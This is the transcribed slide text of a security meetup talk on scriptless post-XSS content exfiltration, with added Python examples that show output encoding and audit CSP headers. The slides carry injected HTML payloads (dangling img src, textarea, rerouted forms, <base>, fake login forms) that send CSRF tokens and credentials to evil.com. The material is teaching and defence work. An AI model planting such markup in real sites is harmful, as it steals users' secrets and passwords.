SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 

Postcards from the post xss world- content exfiltration null

1. Postcards from the post-XSS world - Content Exfiltration technique.
   By: Piyush Pattanayak
   Null Chennai Meet
2. Introduction to XSS
   • A type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites.
   • Occurs when an attacker uses a web application to send malicious code, generally in the form of a client-side script, to a different end user.
   • The flaws that allow these attacks to succeed are prevalent in most web applications that take user input and generate output from it without adequate validation or encoding.
   • An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way of determining that the script should not be trusted, and will execute it.
   • This gives the malicious script access to cookies and other sensitive information retained by the browser for use by the site. Such scripts can also rewrite the HTML content of the page.
3. How to test for XSS
   • XSS should be tested in anything that accepts user input and displays it in the web page after rendering it. XSS attacks succeed because most programmers do not apply HTML encoding to user input, trusting it as received.
   • E.g.: if a user enters "<script>alert(document.cookie)</script>" in a text field, it may be rendered on submission as a script tag, producing a popup alert showing the cookies.
   • There are plenty of other XSS vectors, and further information about XSS, which you can find at OWASP.
4. Introduction to Post XSS
   • What?
      – Very similar to XSS.
   • Why post-XSS?
      – Browser-level efforts to improve the security of web applications focus on the containment of attacker-originating scripts.
      – Content Security Policy removes the ability to inline JavaScript code in a protected HTML document.
      – Whitelisting of permissible sources for any externally loaded scripts.
      – Related approaches, such as the NoScript add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note.
5. Content Exfiltration
   • The goal of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application.
   • Historically, XSS exploits sought to obtain HTTP (session) cookies.
   • The introduction of httponly cookies greatly limited this possibility.
   • In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following:
      – Personal data
      – Tokens used to defend against cross-site request forgery attacks
      – Capability-bearing URLs
6. Several Exfiltration Strategies
   • Dangling markup injection
   • <textarea>-based consumption
   • Rerouting of existing forms
   • Use of <base> to hijack relative URLs
   • Form injection to intercept browser-managed passwords
   • The limits of exfiltration defenses
7. 1. Dangling markup injection
   • Injection of non-terminated markup, which will consume a significant portion of the subsequent HTML syntax until the expected terminating sequence is encountered.
   • Opposite quote: the injected attribute is opened with the quote character that the surrounding markup does not use (here the apostrophe), so its value is only terminated by a later, naturally occurring apostrophe in the page.
   • Scenario: if we are allowed to inject anything into the HTML content above the sensitive data which we need to steal.
   • Example:
      – <img src='http://evil.com/log.cgi?                    ← Injected line with a non-terminated parameter
        ...
        <input type="hidden" name="xsrf_token" value="12345">
        ...
        '                                                    ← Normally-occurring apostrophe in page text
        ...
        </div>
   http://nullcon.net/
8. Dangling markup injection cont..
   • Limitation: the injection point must appear before the sensitive data to be extracted.
   • If governed by pure chance, this condition will be met in 50% of all cases.
   • Demo: Dangling Markup Injection
   http://null.co.in/
9. 2. <textarea>-based consumption
   • The previous method had a limitation: it depends on a matching quote character occurring later in the page.
   • Injection of a text area.
   • Scenario: if a mixture of single and double quotes is present before the sensitive data which we want to steal.
   • Can be injected before or after the legitimate form tag.
   • Example:
      – <form action='http://evil.com/log.cgi'><textarea>     ← Injected line
        ...
        <input type="hidden" name="xsrf_token" value='12345'>
        ...
        (EOF)
10. <textarea>-based consumption cont..
   • Limitation: in contrast to the previous method, a degree of user interaction is needed to exfiltrate the data.
   • The victim has to submit the form by some means.
   • Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers.
   • Demo: <textarea>-based consumption
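Both of the vectors above (slides 7 to 10) only work because the untrusted value reaches the page without output encoding. The following is an added example, not code from the talk or from the lcamtuf write-up it references: a constructed page template in which a comment is interpolated above a hidden xsrf_token, rendered once raw and once through html.escape, plus a small scanner that reproduces the HTML5 tokenizer rule for single-quoted attribute values so you can see exactly what a dangling src=' swallows. The payload strings are the ones from slides 7 and 9; the template, token value and function names are my own.

```python
import html
from typing import Optional

# Constructed sample page (not from the slides): an untrusted comment is
# interpolated above a form carrying a hidden anti-CSRF token, and the page
# text further down happens to contain an apostrophe.
PAGE_TEMPLATE = (
    '<div class="comment">{comment}</div>\n'
    '<form action="update_profile.php">\n'
    '  <input type="hidden" name="xsrf_token" value="12345">\n'
    '  <input type="submit" value="Save">\n'
    '</form>\n'
    '<p class="footer">Don\'t forget to log out.</p>\n'
)
SECRET = "12345"  # constructed token value, same as on the slides

# The two payload shapes from slides 7 and 9, reproduced only to show what
# correct output encoding does to them.
DANGLING_PAYLOAD = "<img src='http://evil.com/log.cgi?"
TEXTAREA_PAYLOAD = "<form action='http://evil.com/log.cgi'><textarea>"


def render_unsafe(comment: str) -> str:
    """Vulnerable rendering: raw interpolation, the bug the slides rely on."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_safe(comment: str) -> str:
    """Hardened rendering for a text-node context. quote=True also encodes
    ' and ", so the value can neither open a tag nor start an attribute."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


def single_quoted_attr_value(doc: str, attr: str = "src") -> Optional[str]:
    """Mimic the HTML5 tokenizer's 'attribute value (single-quoted)' state:
    once attr=' has been seen, the value runs to the next apostrophe, and
    newlines, <, > and entire tags in between are swallowed into it.
    Returns that value, or None if no such attribute occurs."""
    marker = attr + "='"
    start = doc.find(marker)
    if start == -1:
        return None
    start += len(marker)
    end = doc.find("'", start)
    return doc[start:] if end == -1 else doc[start:end]


def count_tags(doc: str, name: str) -> int:
    """Number of start tags of the given name actually present in the markup."""
    return doc.lower().count("<" + name.lower())


def demo() -> dict:
    """Compare both renderings for both payloads; this is the kind of table a
    template review would produce."""
    unsafe = render_unsafe(DANGLING_PAYLOAD)
    safe = render_safe(DANGLING_PAYLOAD)
    return {
        "unsafe_src_value": single_quoted_attr_value(unsafe),
        "unsafe_leaks_token": SECRET in (single_quoted_attr_value(unsafe) or ""),
        "safe_src_value": single_quoted_attr_value(safe),
        "safe_img_tags": count_tags(safe, "img"),
        "textarea_unsafe_forms": count_tags(render_unsafe(TEXTAREA_PAYLOAD), "form"),
        "textarea_safe_forms": count_tags(render_safe(TEXTAREA_PAYLOAD), "form"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

In the raw rendering the src value runs from the injected apostrophe to the one in "Don't", so the hidden token is part of the URL the browser would request; in the encoded rendering there is no <img> tag at all and the second <form> from the textarea payload never opens. The encoding is context-specific: html.escape is right for a value placed in a text node or a quoted attribute, but a value placed inside a URL or a script block needs the encoder for that context. Note also that current Chromium-based browsers refuse to fetch URLs that contain a raw newline together with a <, which blunts slide 7 specifically; it does not help against the <textarea> form submission, so output encoding remains the fix.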
11. 3. Rerouting of existing forms
   • This works because <form> tags cannot be nested.
   • Scenario: if we can inject anything above an existing form tag.
   • This allows the attacker to change the action URL to which any existing form will be submitted.
   • Example:
      – <form action='http://evil.com/log.cgi'>                ← Injected line
        ...
        <form action='update_profile.php'>                     ← Legitimate, pre-existing form
        ...
        <input type="text" name="real_name" value="John Q. Public">
        ...
        </form>
12. Rerouting of existing forms cont..
   • Interesting when used to target forms automatically populated with user-specific secrets.
   • Demo: Rerouting of existing forms
13. 4. <base> to hijack relative URLs
   • Injection of <base> tags.
   • Able to change the semantics of all subsequently appearing relative URLs.
   • Scenario: if we are allowed to insert above the form element.
   • Example:
      – <base href='http://evil.com/'>                          ← Injected line
        ...
        <form action='update_profile.php'>                     ← Legitimate, pre-existing form; with the injected <base> its action now resolves to http://evil.com/update_profile.php
        ...
        <input type="text" name="real_name" value="John Q. Public">
        ...
        </form>
14. <base> to hijack relative URLs cont..
   • Demo: <base> to hijack relative URLs
15. 5. Form injection to intercept browser-managed passwords
   • Browsers have features to remember the username and password for websites.
   • Browsers auto-fill the fields after matching the domain and the id and name attributes of the fields.
   • We can inject a form into a domain using the previous exfiltration techniques to steal the user's credentials.
   • Example:
      – <form action="http://www.evil.com" method="POST">
          <input type="text" id="username" name="username">
          <input type="password" id="password" name="password">
        </form>
16. Form injection to intercept browser-managed passwords cont..
   • We can specify GET instead of POST and submit the credentials to a selected same-site destination.
   • That destination may link to third-party sites (thus leaking the credentials in the Referer header).
   • Or it may echo the parameters in the page.
17. 6. Addendum: The limits of exfiltration defenses
   • All our previous vectors redirect to the attacker's domain.
   • A developer might therefore wish to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain.
   • However, any attempt to prevent exfiltration, even in script-less environments, is unlikely to be successful.
   • Exfiltration attempts do not have to be geared toward relaying the data to a third-party website.
   • Moving data from a private place to a public place, all within the scope of a single website, is also sufficient.
18. Addendum: The limits of exfiltration defenses cont..
   • Example:
      – <form action='/post_review.php'>
        <input type='hidden' name='review_body' value="        ← Injected lines
        ...
        Your current shipping address:                          ← Existing page text to be exfiltrated
        123 Evergreen Terrace
        Springfield, USA
        ...
        <form action="/update_address.php">                     ← Existing form (ignored by the parser)
        ...
        <input type="hidden" name="xsrf_token" value="12345">   ← Token valid for /update_address.php and /post_review.php
        ...
        </form>
   • Demo: Addendum: The limits of exfiltration defenses
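Slides 11 to 14 and the addendum on slides 17 and 18 turn on where injected or rerouted markup is allowed to submit. The destination restriction the addendum describes exists today as the Content Security Policy directives form-action and base-uri, and neither inherits from default-src. The following is an added example, not code from the talk: a small audit function over constructed CSP header strings that reports which of those two directives are missing and whether form-action still permits third-party destinations. Header values and function names are my own.

```python
from typing import Dict, List

# Constructed header values (not from the slides).
WEAK_CSP = "default-src 'self'; script-src 'self'"
HARDENED_CSP = ("default-src 'self'; script-src 'self'; "
                "form-action 'self'; base-uri 'none'")

# Directive -> scriptless vector from the slides that it constrains. Neither
# directive falls back to default-src, so a policy that only sets default-src
# leaves both vectors open even though it already limits <img src=...> fetches.
EXFIL_DIRECTIVES = {
    "form-action": "rerouting of existing forms and injected <form>/<textarea>",
    "base-uri": "<base> hijack of relative URLs",
}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive-name: [source expressions]}.
    Directive names are case-insensitive; a repeated directive is ignored,
    matching how browsers treat duplicates."""
    policy: Dict[str, List[str]] = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def exfiltration_gaps(header: str) -> List[str]:
    """Directives from EXFIL_DIRECTIVES that the policy does not set at all."""
    policy = parse_csp(header)
    return [name for name in EXFIL_DIRECTIVES if name not in policy]


def form_action_is_same_origin_only(header: str) -> bool:
    """True only when form-action is present and every source is 'self' or
    'none', i.e. an injected or rerouted form cannot submit to another host."""
    sources = parse_csp(header).get("form-action")
    if not sources:
        return False
    return all(s.lower() in ("'self'", "'none'") for s in sources)


def audit(header: str) -> List[str]:
    """One finding per problem, for a header you are reviewing."""
    findings = []
    gaps = exfiltration_gaps(header)
    for name in gaps:
        findings.append(f"missing {name}: does not constrain {EXFIL_DIRECTIVES[name]}")
    if "form-action" not in gaps and not form_action_is_same_origin_only(header):
        findings.append("form-action permits third-party destinations")
    return findings


if __name__ == "__main__":
    for label, value in (("weak", WEAK_CSP), ("hardened", HARDENED_CSP)):
        print(label, audit(value) or ["no gaps for the vectors above"])
```

The hardened policy stops the rerouted and injected forms of slides 9, 11 and 15 from posting to evil.com and makes the <base> injection of slide 13 inert. It does not address the addendum: form-action 'self' still lets the injected form on slide 18 submit the shipping address and xsrf_token to /post_review.php on the same site, which is exactly the private-to-public move the slides describe. Treat the policy as a second layer behind output encoding, not as a substitute for it.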
19. Reference
   • http://lcamtuf.coredump.cx/postxss/
20. Thank You
   Q&A